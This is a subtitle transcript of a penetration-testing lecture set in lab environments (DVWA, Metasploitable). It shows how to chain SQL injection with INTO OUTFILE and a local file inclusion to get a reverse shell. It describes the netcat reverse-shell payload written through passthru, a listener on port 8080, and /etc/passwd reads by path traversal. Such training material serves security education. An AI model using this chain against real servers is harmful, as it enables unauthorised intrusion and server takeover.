1
00:00:01,400 --> 00:00:07,910
In the previous lecture we've seen how we can write stuff to the server using an SQL injection with

2
00:00:07,910 --> 00:00:10,180
the INTO OUTFILE function.

3
00:00:10,400 --> 00:00:15,770
And if the server allows us to write to the web directory, to a place that we can browse, then we can

4
00:00:15,770 --> 00:00:20,930
just write our reverse shell using the same code that we've seen before using passthru, and then

5
00:00:20,930 --> 00:00:28,750
we can browse it and we'll get a reverse shell exactly the same way that we did when we uploaded the file.

6
00:00:28,750 --> 00:00:34,730
The problem is we weren't able to write stuff to the web directories, so we can't actually read the stuff

7
00:00:34,750 --> 00:00:36,020
using the URL.

8
00:00:36,160 --> 00:00:39,220
The only place that we could write to was /tmp.

9
00:00:39,220 --> 00:00:42,760
So you can't actually browse /tmp through your URL.

10
00:00:42,910 --> 00:00:45,910
Therefore you can't just browse that file.

11
00:00:45,970 --> 00:00:52,030
So what I'm going to do today is show you a workaround for that problem, but for this workaround

12
00:00:52,030 --> 00:00:59,170
to work the same website or the same server has to have a local file inclusion.

13
00:00:59,200 --> 00:01:00,590
This is very important.

14
00:01:00,610 --> 00:01:05,740
The same web server, not the same website, because we've seen, remember, in the first section how we can

15
00:01:05,740 --> 00:01:09,250
discover all the websites that are within one server.

16
00:01:09,430 --> 00:01:15,370
So if one of them has an SQL injection and the other has a local file inclusion, you can combine

17
00:01:15,370 --> 00:01:19,090
both of these and get a shell, and I'll show you how to do that.

18
00:01:19,450 --> 00:01:22,260
So I'm actually going to be doing this on DVWA.
19
00:01:22,290 --> 00:01:28,230
You can do it on Metasploitable, but I'm just doing it here, just for a change, to show you just another example.

20
00:01:28,330 --> 00:01:32,120
So I'm going to go to the SQL injection and I'm going to put number one here,

21
00:01:34,750 --> 00:01:40,230
submit it, and then we're going to start doing our injection exactly the same way that we always did.

22
00:01:40,240 --> 00:01:51,950
So we close the quote and we do a union select 1, 2, our comment, and that works.

23
00:01:51,960 --> 00:01:59,040
As you can see. Now what I'm going to do, I'm going to write my shell to /tmp and then I'm going to browse

24
00:01:59,040 --> 00:02:01,660
that shell through the local file inclusion.

25
00:02:01,800 --> 00:02:10,690
So my exploit is going to be union select 1, 2, and in 1 I'm actually going to write what I want

26
00:02:10,690 --> 00:02:11,760
to write to the file.

27
00:02:11,890 --> 00:02:17,290
So I'm going to write PHP code, the same PHP code that we've been using to get a reverse connection to

28
00:02:17,290 --> 00:02:30,200
my computer, and the code is going to be passthru, and nc, /bin/sh, my IP, the port, which is 8080,

29
00:02:32,280 --> 00:02:39,000
and instead of number 2 I'm going to put null so nothing will be written to the file.

30
00:02:39,170 --> 00:02:41,240
And then we're going to say INTO OUTFILE

31
00:02:44,560 --> 00:02:48,220
and we'll call this reverse.php.

32
00:02:48,230 --> 00:02:51,710
So let's just have another look at this exploit.

33
00:02:51,710 --> 00:02:57,960
So what we're doing, we're doing a normal union select and we're doing a normal INTO OUTFILE and we're

34
00:02:58,270 --> 00:03:02,020
saving this in /tmp exactly like we've seen in the previous lecture.
35
00:03:02,420 --> 00:03:08,780
But instead of writing just normal stuff we're actually going to write PHP code, and we're going to do

36
00:03:08,780 --> 00:03:17,090
a passthru, and nc, /bin/sh, my IP, port, and what this is going to do, it's actually going to try to

37
00:03:17,090 --> 00:03:21,480
connect to this IP using netcat.

38
00:03:22,110 --> 00:03:26,030
So let's exploit this.

39
00:03:26,360 --> 00:03:31,820
And I'm actually going to set the id here to -1 so that no values come in for the admin and

40
00:03:31,830 --> 00:03:35,940
admin in here in the first name and the surname.

41
00:03:35,960 --> 00:03:42,990
So I just set that to -1 and then I'm going to put my exploit here after the -1, the same way that

42
00:03:42,990 --> 00:03:51,570
we always do it, and enter, and it tells us that the file already exists, but it actually does, and this

43
00:03:51,570 --> 00:03:52,990
is just the normal error.

44
00:03:53,190 --> 00:03:57,450
So this file has been written now to the server.

45
00:03:57,460 --> 00:04:02,590
Now the problem is, if we load this file to somewhere else other than /tmp.

46
00:04:02,590 --> 00:04:13,960
So for example if we can actually write this file to, say, /var/www/dvwa, then we'd be able to just

47
00:04:13,960 --> 00:04:17,610
go and browse this file from here.

48
00:04:19,530 --> 00:04:26,940
So all we have to do is just go to DVWA, to this, and then write in reverse.php, and then we'll

49
00:04:26,940 --> 00:04:28,000
be able to see it.

50
00:04:28,110 --> 00:04:30,820
But again we actually don't have permission to write in here.

51
00:04:30,840 --> 00:04:36,690
You can try to write in images, for example dvwa/images, so you can actually, before you go to this method,

52
00:04:37,050 --> 00:04:41,810
go ahead and try to find a place, a writable place, on the server.

53
00:04:42,030 --> 00:04:43,810
A lot of the time you won't.
54
00:04:43,920 --> 00:04:48,510
Because web admins should actually know about this, and they shouldn't allow you to write stuff

55
00:04:48,510 --> 00:04:49,150
like that.

56
00:04:49,260 --> 00:04:54,120
But if you did, then you're lucky, you can just go ahead and browse it like this; if you didn't, then just

57
00:04:54,120 --> 00:04:57,050
continue this video and see how we're going to exploit it.

58
00:04:57,420 --> 00:05:00,650
So now I'm just going to listen for connections using netcat.

59
00:05:00,690 --> 00:05:06,860
So I'm going to do nc -lp 8080.

60
00:05:08,440 --> 00:05:11,720
And that will listen for incoming connections on port 8080.

61
00:05:11,770 --> 00:05:16,920
So when we execute this code it'll try to connect back to us and we'll get the connection here.

62
00:05:18,000 --> 00:05:21,620
So now we have the file written and we're listening for connections.

63
00:05:21,630 --> 00:05:25,370
All we need is a way to browse this file to get it executed.

64
00:05:25,560 --> 00:05:31,960
So we've seen that we can't actually write anywhere that we can browse it, and because we stored this in

65
00:05:31,960 --> 00:05:37,220
/tmp, if you managed to run it from anywhere on the web server then you'll have a connection and you'll

66
00:05:37,230 --> 00:05:38,800
have access to this website.

67
00:05:38,860 --> 00:05:42,860
So you don't have to find a local file inclusion in the same website.

68
00:05:42,960 --> 00:05:45,940
You can find it in any website on the same server.

69
00:05:46,020 --> 00:05:49,430
And this is where the information gathering part comes in really handy.

70
00:05:49,920 --> 00:05:54,350
So what I'm going to do now is I'm actually just going to run it from within DVWA,

71
00:05:54,490 --> 00:05:57,760
but I just want you to know that you can do this.

72
00:05:57,840 --> 00:06:04,500
Since we stored it in /tmp you can open it and browse it from within any website on the server.
73
00:06:04,500 --> 00:06:10,460
So all you have to do is just find a website on the same server that has a local file inclusion.

74
00:06:10,470 --> 00:06:14,340
Now I'm going to go to the file inclusion, and we've used this before.

75
00:06:14,340 --> 00:06:23,620
So what I'm going to do is I'm just going to browse to /etc/passwd first to make sure it works, and

76
00:06:23,620 --> 00:06:24,580
it works.

77
00:06:24,580 --> 00:06:29,020
Now we're going to browse to our file that we just uploaded, which is stored in /tmp,

78
00:06:31,860 --> 00:06:37,210
reverse.php.

79
00:06:37,380 --> 00:06:45,000
And as you can see now we've got a connection and we can run any commands we want on the server, and

80
00:06:45,600 --> 00:06:48,740
pretty much we have a reverse shell and we can do whatever we want on it.

81
00:06:51,750 --> 00:06:58,080
Now I'm going to listen on 8080 again, and what I want to do is I want to show you how you can exploit

82
00:06:58,080 --> 00:06:59,940
this now from anywhere within the server.

83
00:06:59,940 --> 00:07:02,710
So I'm actually going to go to Metasploitable instead of DVWA

84
00:07:05,900 --> 00:07:09,360
and we're going to go to the local file inclusion vulnerability in here.

85
00:07:12,850 --> 00:07:15,610
So we'll try to exploit this now the same way.

86
00:07:15,610 --> 00:07:17,470
So it's five times back,

87
00:07:19,980 --> 00:07:21,540
/etc/passwd.

88
00:07:21,660 --> 00:07:24,210
And as you can see we can read /etc/passwd.

89
00:07:24,330 --> 00:07:26,810
Now all we have to do is just read /tmp.

90
00:07:26,820 --> 00:07:29,840
So this is a completely separate website from DVWA.

91
00:07:30,090 --> 00:07:35,700
We found, let's assume that we found an SQL injection in DVWA anyway, and then we found a local file inclusion

92
00:07:35,700 --> 00:07:41,050
in this; combining the two, because the two websites are installed on the same server, on the same computer,
93
00:07:41,070 --> 00:07:44,960
we can actually get a reverse shell on that server and do that.

94
00:07:44,970 --> 00:07:49,860
We're just going to go to /tmp/reverse.php.

95
00:07:50,090 --> 00:07:55,880
And again as you can see we have our shell here, where we can do whatever we want on the target's web

96
00:07:55,880 --> 00:07:57,100
server.

97
00:07:57,110 --> 00:08:02,490
So again the idea to take from here is, using INTO OUTFILE you can write stuff anywhere.

98
00:08:02,630 --> 00:08:06,860
If you can write stuff within the web directory then you're lucky, you can write your reverse shell and

99
00:08:06,860 --> 00:08:10,980
just browse it through the URL as if you're browsing any file on the web server.

100
00:08:11,030 --> 00:08:17,420
If you can't, then look for another website on the same server that has a local file inclusion, and if

101
00:08:17,420 --> 00:08:22,910
you do then you can just write the file using the SQL injection and then browse it using the local file

102
00:08:22,910 --> 00:08:25,040
inclusion, and you have your shell.